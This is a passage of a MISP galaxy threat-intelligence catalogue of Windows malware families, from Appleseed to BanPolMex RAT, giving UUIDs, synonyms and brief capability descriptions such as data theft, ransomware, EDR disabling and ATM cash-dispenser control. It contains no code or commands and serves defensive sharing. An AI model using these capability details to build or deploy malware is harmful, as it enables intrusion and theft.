"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Appleseed.

Known Synonyms
`JamBog`

Internal MISP references

UUID c7f8e3b8-328d-43c3-9235-9a2f704389b4 which can be used as unique global reference for Appleseed in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ArdaMax

According to f-secure, Ardamax is a commercial keylogger program that can be installed onto the system from the product's website.& When run, the program can capture a range of user activities, such as keystrokes typed, instant messenger chat logs, web browser activity and even screenshots of the active desktop.

This program can be configured to a complete stealth mode, with password protection, to avoid user detection.

The information gathered is stored in an encrypted log file, which is only viewable using the built-in Log Viewer. The log file can be sent to an external party through e-mail, via a local area network (LAN) or by upload to an FTP server (in either HTML or encrypted format).

Internal MISP references

UUID 4f5c2f8b-06ef-4fb3-b03c-afdcafa88de5 which can be used as unique global reference for ArdaMax in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Arefty

Internal MISP references

UUID bf135b0a-3120-42c4-ba58-c80f9ef689bf which can be used as unique global reference for Arefty in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Ares (Windows)

A banking trojan, derived from the source code of win.kronos. In August 2022 it started to incorporate DGA code from win.qakbot.

Internal MISP references

UUID a711ad02-0120-41a1-8c03-8a857a7dc297 which can be used as unique global reference for Ares (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

AresLoader

AresLoader is a new malware "downloader" that has been advertised on some Russian language Dark Web forums “RAMP and "XSS" by a threat actor called "DarkBLUP". Researchers assess this loader is likely a legitimate penetration testing tool that is now being abused by threat actors. This is because of a similar project, dubbed “Project Ares,” was previously uploaded to GitHub as a proof-of-concept (PoC) by the well-regarded user and red teamer “CerberSec.”

The loader mimics legitimate software to trick victims into executing malware with administrator rights on their machines. Additional features of the loader include:

Written in C/C++
Supports 64-bit payloads
Makes it look like malware spawned by another process
Prevents non-Microsoft signed binaries from being injected into malware
Hides suspicious imported Windows APIs
Leverages anti-analysis techniques to avoid reverse engineering

Furthermore, It was observed that SystemBC, Amadey, and several Raccoon Stealers were directly installing AresLoader. To date, the AresLoader downloader has been seen delivering payloads like SystemBC, Lumma Stealer, StealC, Aurora Stealer, and Laplas Clipper.

Internal MISP references

UUID 1bd6c2ab-341e-43e1-90ca-2e7509828268 which can be used as unique global reference for AresLoader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ArguePatch

During a campaign against a Ukrainian energy provider, a new loader of a new version of CaddyWiper called "ArguePatch" was observed by ESET researchers. ArguePatch is a modified version of Hex-Ray's Remote Debugger Server (win32_remote.exe). ArguePatch expects a decryption key and the file of the CaddyWiper shellcode as command line parameters.

Internal MISP references

UUID e9b4bec3-ad18-49cc-b6af-c0ffcc283153 which can be used as unique global reference for ArguePatch in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Aria-body

Internal MISP references

UUID 5fa1c068-8e73-4930-b6fe-8c92c6357df6 which can be used as unique global reference for Aria-body in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Arid Gopher

This malware is a Go written variant of Micropsia and according to DeepInstinct it is still in development.

Internal MISP references

UUID 2037d9f1-bf2a-44e1-b04f-98fe3f961381 which can be used as unique global reference for Arid Gopher in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

AridHelper

Helper malware associated with AridGopher, which will provide an alternative persistence mechanism in case "360 total security" is found on a target system.

Internal MISP references

UUID 6bd3759f-5961-423d-9437-c67bddcda458 which can be used as unique global reference for AridHelper in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Arik Keylogger

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Arik Keylogger.

Known Synonyms
`Aaron Keylogger`

Internal MISP references

UUID 3572d725-bf13-43ef-9511-bdbb7692ab06 which can be used as unique global reference for Arik Keylogger in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Arkei Stealer

Arkei is a stealer that appeared around May 2018. It collects data about browsers (saved passwords and autofill forms), cryptocurrency wallets, and steal files matching an attacker-defined pattern. It then exfiltrates everything in a zip file uploaded to the attacker's panel. Later, it was forked and used as a base to create Vidar stealer.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Arkei Stealer.

Known Synonyms
`ArkeiStealer`

Internal MISP references

UUID 59eff508-7f26-4fd8-b526-5772a9f3d9a6 which can be used as unique global reference for Arkei Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ArrowRAT

It is available as a service, purchasable by anyone to use in their own campaigns. It’s features are generally fairly typical of a RAT, with its most notable aspect being the hVNC module which basically gives an attacker full remote access with minimal need for technical knowledge to use it.

Internal MISP references

UUID 3d5608dc-1e0d-40cb-8a17-3a8d7efb1c53 which can be used as unique global reference for ArrowRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ARS VBS Loader

ARS Loader, also known as ARS VBS Loader, is written in Visual Basic Script and its main purpose is to control an infected machine via different available commands, acting as a remote access trojan (RAT). Its code is based on ASPC, another Visual Basic Script malware, which at the same time seems to be based on SafeLoader.

Internal MISP references

UUID 1a4f99cc-c078-41f8-9749-e1dc524fc795 which can be used as unique global reference for ARS VBS Loader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ARTFULPIE

Internal MISP references

UUID bc0ad216-9b56-489e-858d-68522e1fdfaf which can be used as unique global reference for ARTFULPIE in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Artra Downloader

Internal MISP references

UUID 05de9c50-5958-4d02-b1a0-c4a2367c2d22 which can be used as unique global reference for Artra Downloader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Asbit

Internal MISP references

UUID 488b735f-9138-4970-9d20-77132f4a82d6 which can be used as unique global reference for Asbit in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

AscentLoader

Internal MISP references

UUID 4e3fa4e6-bc7d-4024-b191-ccafa5347c13 which can be used as unique global reference for AscentLoader in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.ascentloader - webarchive

Associated metadata

Metadata key	Value
type	[]

ASPC

Internal MISP references

UUID bc128d41-33e6-40ec-aaf2-9a05da9a0a27 which can be used as unique global reference for ASPC in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.aspc - webarchive

Associated metadata

Metadata key	Value
type	[]

Asprox

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Asprox.

Known Synonyms
`Aseljo`
`BadSrc`

Internal MISP references

UUID ba557993-f64e-4538-8f13-dafaa3c0db00 which can be used as unique global reference for Asprox in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Asruex

Internal MISP references

UUID a51595aa-a399-4332-a14d-a378bae609e7 which can be used as unique global reference for Asruex in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Astaroth

First spotted in the wild in 2017, Astaroth is a highly prevalent, information-stealing Latin American banking trojan. It is written in Delphi and has some innovative execution and attack techniques. Originally, this malware variant targeted Brazilian users, but Astaroth now targets users both in North America and Europe.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Astaroth.

Known Synonyms
`Guildma`

Internal MISP references

UUID 0cdb83dd-106b-458e-8d04-ca864281e06e which can be used as unique global reference for Astaroth in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Astasia

Astasia is a banking trojan that spreads through phishing emails that contain an executable attachment. Once the attachment is executed, Astasia downloads and installs a trojan that runs in the background. The trojan can steal personal information, such as passwords and credit card numbers, from victims.

Internal MISP references

UUID 6cc38bdd-f7ac-4775-bc41-69e72b761ab5 which can be used as unique global reference for Astasia in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

AstraLocker

Internal MISP references

UUID d32a6790-57c7-4985-b6e0-5b73f025fb43 which can be used as unique global reference for AstraLocker in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

AsyncRAT

AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victim’s computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.

Internal MISP references

UUID c94c4f23-20d1-4858-8f94-01a54b213981 which can be used as unique global reference for AsyncRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Atharvan

Internal MISP references

UUID b1ff6117-7dd2-4328-bde8-00d74584fc98 which can be used as unique global reference for Atharvan in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Athena

Part of the Mythic framework, payload in C# (.NET 6), support HTTP, Websockets, Slack, SMB for C2.

Internal MISP references

UUID 69bcd272-e69e-4548-bb8e-05eedcc3f13e which can be used as unique global reference for Athena in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

AthenaGo RAT

Internal MISP references

UUID 587eff78-47be-4022-a1b5-7857340a9ab2 which can be used as unique global reference for AthenaGo RAT in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.athenago - webarchive

Associated metadata

Metadata key	Value
type	[]

ATI-Agent

Internal MISP references

UUID e248d80d-de8e-45de-b6d0-3740e5b34573 which can be used as unique global reference for ATI-Agent in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Atlantida

Internal MISP references

UUID 4c7d243d-ffbe-4fc4-afe3-0961ba99e2b0 which can be used as unique global reference for Atlantida in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

AtlasAgent

Internal MISP references

UUID 2fa8f479-63c3-4f91-954a-f30a50d2ad6e which can be used as unique global reference for AtlasAgent in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ATMii

Internal MISP references

UUID f2a7c867-6380-4cbe-b524-50727a29f0c6 which can be used as unique global reference for ATMii in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ATMitch

Internal MISP references

UUID 5f427b3a-7162-4421-b2cd-e6588d518448 which can be used as unique global reference for ATMitch in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Atmosphere

Internal MISP references

UUID 15918921-93b8-4b3a-a612-e1d1f769c420 which can be used as unique global reference for Atmosphere in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ATMSpitter

The ATMSpitter family consists of command-line tools designed to control the cash dispenser of an ATM through function calls to either CSCWCNG.dll or MFSXFS.dll. Both libraries are legitimate Windows drivers used to interact with the components of different ATM models.

Internal MISP references

UUID 5a03a6ff-e127-4cd2-aab1-75f1e3ecc187 which can be used as unique global reference for ATMSpitter in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ATOMSILO

According to PCrisk, AtomSilo is a type of malware that blocks access to files by encrypting them and renames every encrypted file by appending the ".ATOMSILO" to its filename. It renames "1.jpg" to "1.jpg.ATOMSILO", "2.jpg" to "2.jpg.ATOMSILO", and so on. As its ransom note, AtomSilo creates the "README-FILE-#COMPUTER-NAME#-#CREATION-TIME#.hta" file.

Internal MISP references

UUID f47633fb-2c2b-46c3-a1e6-2204d56897b8 which can be used as unique global reference for ATOMSILO in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Attor

Attor is a cyberespionage platform used in targeted attacks against diplomatic missions and governmental institutions since at least 2013. Its most interesting features are a complex modular architecture, elaborate network communications, and a unique plugin to fingerprint GSM/GPRS devices.

Attor’s core lies in its dispatcher, which serves as a management unit for additional plugins which provide all of malware’s key capabilities. This allows the attackers to customize the platform on a per-victim basis. Plugins themselves are heavily synchronized. Network communication is based on Tor, aiming for anonymity and untraceability.

The most notable plugin can detect connected GSM/GPRS modems or mobile devices. Attor speaks to them directly using the AT command set, in order to collect sensitive information such as the IMEI, IMSI or MSISDN numbers, possibly identifying both the device and its subscriber. Other plugins provide persistence, an exfiltration channel, C&C communication and several further spying capabilities. The plugin responsible for capturing victim's screen targets social networks and blogging platforms, email services, office software, archiving utilities, file sharing and messaging services.

Internal MISP references

UUID f5f61bc0-aad2-4da3-83db-703ea516c03b which can be used as unique global reference for Attor in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

August Stealer

Internal MISP references

UUID 2ee0122a-701d-487d-9ac1-7d91e4f99d78 which can be used as unique global reference for August Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

AuKill

According to Sophos, the AuKill tool abuses an outdated version of the driver used by version 16.32 of the Microsoft utility, Process Explorer, to disable EDR processes before deploying either a backdoor or ransomware on the target system.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular AuKill.

Known Synonyms
`SophosKill`

Internal MISP references

UUID 07bd266b-811a-4abe-83b3-471918d6fab4 which can be used as unique global reference for AuKill in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Auriga

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Auriga.

Known Synonyms
`Riodrv`

Internal MISP references

UUID e3065e43-503b-4496-921b-7601dd3d6abd which can be used as unique global reference for Auriga in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Aurora

Ransomware

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Aurora.

Known Synonyms
`OneKeyLocker`

Internal MISP references

UUID 2f899e3e-1a46-43ea-8e68-140603ce943d which can be used as unique global reference for Aurora in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Aurora Stealer

First advertised as a Malware-as-a-Service (MaaS) on Russian-speaking underground forums in April 2022, Aurora Stealer is a Golang-based information stealer with downloading and remote access capabilities. The malware targets data from multiple browsers, cryptocurrency wallets, local systems, and act as a loader. During execution, the malware runs several commands through WMIC to collect basic host information, snaps a desktop image, and exfiltrates data to the C2 server within a single base64-encoded JSON file.

Internal MISP references

UUID ac697773-7239-4f01-b4b3-7da8b2a64bdf which can be used as unique global reference for Aurora Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Avaddon

Avaddon is a ransomware malware targeting Windows systems often spread via malicious spam. The first known attack where Avaddon ransomware was distributed was in February 2020. Avaddon encrypts files using the extension .avdn and uses a TOR payment site for the ransom payment.

Internal MISP references

UUID 8f648193-68ca-40c2-98b2-e5481487463e which can be used as unique global reference for Avaddon in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

AvastDisabler

Internal MISP references

UUID 96a695de-2560-4f10-bbd6-3bc2ac27b7f7 which can be used as unique global reference for AvastDisabler in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

AVCrypt

Bleeping Computer notes about discovery of AVCrypt, a malware that tries to uninstall existing security software before it encrypts a computer. Furthermore, as it removes numerous services, including Windows Update, and provides no contact information, this ransomware may be a wiper.

Internal MISP references

UUID 0568fcc6-755f-416e-9c5b-22232cd7ae0e which can be used as unique global reference for AVCrypt in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

AvD Crypto Stealer

Cyble Research discovered this .Net written malware dubbed "AvD Crypto Stealer". The name of this malware is misleading, because this is a kind of clipper malware. Assumption of Cyble is, that this malware could target other threat actors as scenario.

Internal MISP references

UUID de92fff8-337e-4cf8-853b-f13f08ffc24d which can be used as unique global reference for AvD Crypto Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Aveo

Internal MISP references

UUID 606b160a-5180-4255-a1db-b2b9e8a52e95 which can be used as unique global reference for Aveo in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Ave Maria

Information stealer which uses AutoIT for wrapping.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Ave Maria.

Known Synonyms
`AVE_MARIA`
`AveMariaRAT`
`Warzone RAT`
`WarzoneRAT`
`avemaria`

Internal MISP references

UUID 6bae792a-c2d0-42eb-b9e0-6ef1d83f9b25 which can be used as unique global reference for Ave Maria in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

AvosLocker

AvosLocker is a ransomware-as-a-service (RaaS) gang that first appeared in mid-2021. It has since become notorious for its attacks targeting critical infrastructure in the United States, including the sectors of financial services, critical manufacturing, and government facilities.

In March 2022, the FBI and US Treasury Department issued a warning about the attacks.

Internal MISP references

UUID 8cee7a73-df5f-4ca3-ac52-b8a29a9b7414 which can be used as unique global reference for AvosLocker in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Unidentified 061 (Windows)

Was previously wrongly tagged as PoweliksDropper, now looking for additional context.

Internal MISP references

UUID 969d1054-b917-4fb8-b3f8-1e33926fdb65 which can be used as unique global reference for Unidentified 061 (Windows) in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.avrecon - webarchive

Associated metadata

Metadata key	Value
type	[]

Avzhan

Internal MISP references

UUID b12d9354-f67b-47dd-944c-82cfdff7b9a3 which can be used as unique global reference for Avzhan in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

AXLocker

Internal MISP references

UUID 017ea8db-6eb4-4df1-bac0-da908d2aea9f which can be used as unique global reference for AXLocker in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Ayegent

Internal MISP references

UUID c84a6b0b-28a5-4293-b8fc-6a6eeb7b5f70 which can be used as unique global reference for Ayegent in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.ayegent - webarchive

Associated metadata

Metadata key	Value
type	[]

Aytoke

Keylogger.

Internal MISP references

UUID 91524400-097c-4584-9168-05b317d57b63 which can be used as unique global reference for Aytoke in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Azorult

AZORult is a credential and payment card information stealer. Among other things, version 2 added support for .bit-domains. It has been observed in conjunction with Chthonic as well as being dropped by Ramnit.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Azorult.

Known Synonyms
`PuffStealer`
`Rultazo`

Internal MISP references

UUID 0dfbe48e-a3da-4265-975e-1eb37ad9c51c which can be used as unique global reference for Azorult in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Azov Wiper

According to Checkpoint, this malware is a wiper instead of ransomware as self-announced. It is manually written in FASM, unrecoverably overwriting data in blocks of 666 bytes, using multi-threading.

Internal MISP references

UUID db8dee2a-938e-46af-b2e3-ef5d6e626da7 which can be used as unique global reference for Azov Wiper in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Babadeda

According to PCrisk, Babadeda is a new sample in the crypters family, allowing threat actors to encrypt and obfuscate the malicious samples. The obfuscation allows malware to bypass the majority of antivirus protections without triggering any alerts. According to the researchers’ analysis, Babadeda leverages a sophisticated and complex obfuscation that shows a very low detection rate by anti-virus engines.

Internal MISP references

UUID fcb369e1-0783-4188-8841-936c6976035f which can be used as unique global reference for Babadeda in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Babar

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Babar.

Known Synonyms
`SNOWBALL`

Internal MISP references

UUID 947dffa1-0184-48d4-998e-1899ad97e93e which can be used as unique global reference for Babar in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Babuk (Windows)

Babuk Ransomware is a sophisticated ransomware compiled for several platforms. Windows and ARM for Linux are the most used compiled versions, but ESX and a 32bit old PE executable were observed over time. as well It uses an Elliptic Curve Algorithm (Montgomery Algorithm) to build the encryption keys.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Babuk (Windows).

Known Synonyms
`Babyk`
`Vasa Locker`

Internal MISP references

UUID 3e243686-a0a0-4aff-b149-786cc3f99a84 which can be used as unique global reference for Babuk (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BabyLon RAT

Internal MISP references

UUID 1a196c09-f7cd-4a6e-bc3c-2489121b5381 which can be used as unique global reference for BabyLon RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BABYMETAL

BABYMETAL is a command line network tunnel utility based on the TinyMet Meterpreter tool, primarily used to execute Meterpreter reverse shell payloads.

Internal MISP references

UUID 30c2e5c6-851d-4f3a-8b6e-2e7b69a26467 which can be used as unique global reference for BABYMETAL in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BabyShark

BabyShark is Microsoft Visual Basic (VB) script-based malware family first seen in November 2018. The malware is launched by executing the first stage HTA from a remote location, thus it can be delivered via different file types including PE files as well as malicious documents. It exfiltrates system information to C2 server, maintains persistence on the system, and waits for further instruction from the operator

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BabyShark.

Known Synonyms
`LATEOP`

Internal MISP references

UUID 8abdd40c-d79a-4353-80e3-29f8a4229a37 which can be used as unique global reference for BabyShark in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Bachosens

Internal MISP references

UUID c5b3d358-62f8-46fe-85dc-44b565052f94 which can be used as unique global reference for Bachosens in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BACKBEND

FireEye describes BACKBEND as a secondary downloader used as a backup mechanism in the case the primary backdoor is removed. When executed, BACKBEND checks for the presence of the mutexes MicrosoftZj or MicrosoftZjBak (both associated with BACKSPACE variants). If either of the mutexes exist, the malware exits.

Internal MISP references

UUID 934da8b2-f66e-4056-911e-1da09216e8b8 which can be used as unique global reference for BACKBEND in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BackConfig

Internal MISP references

UUID b3c517cf-6704-43b0-a6da-fed94c9b537a which can be used as unique global reference for BackConfig in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BackNet

Internal MISP references

UUID e2840cc1-c43d-4542-9818-a3c15a0f9f7a which can be used as unique global reference for BackNet in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Backoff POS

Internal MISP references

UUID 70f68c8c-4dc5-4bb0-9f4d-a7484561574b which can be used as unique global reference for Backoff POS in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

backspace

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular backspace.

Known Synonyms
`Lecna`
`ZRLnk`

Internal MISP references

UUID 23398248-a52a-4a7c-af10-262822d33a4e which can be used as unique global reference for backspace in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BackSwap

Internal MISP references

UUID 4ec40af9-0295-4b9a-81ad-b7017a21609d which can be used as unique global reference for BackSwap in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BADCALL (Windows)

Internal MISP references

UUID 9ddf546b-487f-44e4-b0dd-07e9997c86c6 which can be used as unique global reference for BADCALL (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BadEncript

Internal MISP references

UUID af1c99be-e55a-473e-abed-726191e1da05 which can be used as unique global reference for BadEncript in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

badflick

BADFLICK, a backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command-and-control configuration.

Internal MISP references

UUID 1eceb5c0-3a01-43c2-b204-9957b15cf763 which can be used as unique global reference for badflick in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BADHATCH

Internal MISP references

UUID 8e8880bf-d016-4759-a138-2fdb4e54f9ab which can be used as unique global reference for BADHATCH in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BadNews

Internal MISP references

UUID f28fa5ca-9466-410c-aa32-4bd102f3f0e1 which can be used as unique global reference for BadNews in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Bagle

Internal MISP references

UUID f09af1cc-cf9d-499a-9026-e783a3897508 which can be used as unique global reference for Bagle in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Bahamut (Windows)

Internal MISP references

UUID b420eb9f-d526-473c-95ab-5ab380bbec72 which can be used as unique global reference for Bahamut (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Baldr

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Baldr.

Known Synonyms
`Baldir`

Internal MISP references

UUID 7024893a-96fe-4de4-bb04-c1d4794a4c95 which can be used as unique global reference for Baldr in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BalkanDoor

According to ESET, BalkanDoor is a simple backdoor with a small number of commands (download and execute a file, create a remote shell, take a screenshot). It can be used to automate tasks on the compromised computer or to automatically control several affected computers at once. We have seen six versions of the backdoor, with a range of supported commands, evolve since 2016.

Internal MISP references

UUID 22d61347-4d89-41e7-89dc-95b1f370522d which can be used as unique global reference for BalkanDoor in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BalkanRAT

The goal of BalkanRAT which is a more complex part of the malicious Balkan-toolset (cf. BalkanDoor) is to deploy and leverage legitimate commercial software for remote administration. The malware has several additional components to help load, install and conceal the existence of the remote desktop software. A single long-term campaign involving BalkanRAT has been active at least from January 2016 and targeted accouting departments of organizations in Croatia, Serbia, Montenegro, and Bosnia and Herzegovina (considered that the contents of the emails, included links and decoy PDFs all were involving taxes). It was legitimaly signed and installed by an exploit of the WinRAR ACE vulnerability (CVE-2018-20250).

Internal MISP references

UUID d7b40333-a2ce-423d-9052-51b09bf18bb3 which can be used as unique global reference for BalkanRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Bamital

Internal MISP references

UUID f355f41b-a6b2-48b7-9c5c-da99a41cb1ad which can be used as unique global reference for Bamital in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Banatrix

Internal MISP references

UUID 721fe429-f240-4fd6-a5c9-187195624b51 which can be used as unique global reference for Banatrix in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

bancos

Internal MISP references

UUID a2ee2f24-ead8-4415-b777-7190478a620c which can be used as unique global reference for bancos in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Bandit Stealer

Internal MISP references

UUID 53ef2273-0e62-4ad3-bcbc-d2cd72fc6108 which can be used as unique global reference for Bandit Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Bandook

Bandook malware is a remote access trojan (RAT) first seen in 2007 and has been active for several years. Written in both Delphi and C++, it was first seen as a commercial RAT developed by a Lebanese creator named PrinceAli. Over the years, several variants of Bandook were leaked online, and the malware became available for public download.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Bandook.

Known Synonyms
`Bandok`

Internal MISP references

UUID 3144e23d-6e3e-47e6-8f0e-a47be25d1041 which can be used as unique global reference for Bandook in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

bangat

Internal MISP references

UUID 5c3c53ff-c81f-4daa-9b60-672650046ed7 which can be used as unique global reference for bangat in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Banjori

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Banjori.

Known Synonyms
`BackPatcher`
`BankPatch`
`MultiBanker 2`

Internal MISP references

UUID 137cde28-5c53-489b-ad0b-d0fa2e342324 which can be used as unique global reference for Banjori in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Bankshot

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Bankshot.

Known Synonyms
`COPPERHEDGE`
`FoggyBrass`

Internal MISP references

UUID bc67677c-c0e7-4fb1-8619-7f43fa3ff886 which can be used as unique global reference for Bankshot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

BanPolMex RAT

BanPolMex is a remote access trojan that uses TCP for communication.

It uses an RC4-like stream cipher called Spritz for encryption of its configuration and network traffic.

It sends detailed information about the victim's environment, like computer name, Windows version, free space of memory and all drives, processor identifier and architecture, system locale, system metrics, manufacturer, and network configuration.

It supports almost 30 commands that include operations on the victim’s filesystem, basic process management, file exfiltration, and the download and execution of additional tools from the attacker’s C&C server. As in many RATs from Lazarus arsenal, the commands are indexed by 32-bit integers. However, in this case the indicis are convertible into a meaningful ASCII representation, that even suggests the functionality: SLEP, HIBN, DRIV, DIR, DIRP, CHDR, RUN, RUNX, DEL, WIPE, MOVE, FTIM, NEWF, DOWN, ZDWN, UPLD, PVEW, PKIL, CMDL, DIE, GCFG, SCFG, TCON, PEEX, PEIN.

It has aclui.dll as the internal DLL name. It contains statically linked code from open-source libraries like libcurl (version 7.47.1) or zLib (version 0.15).

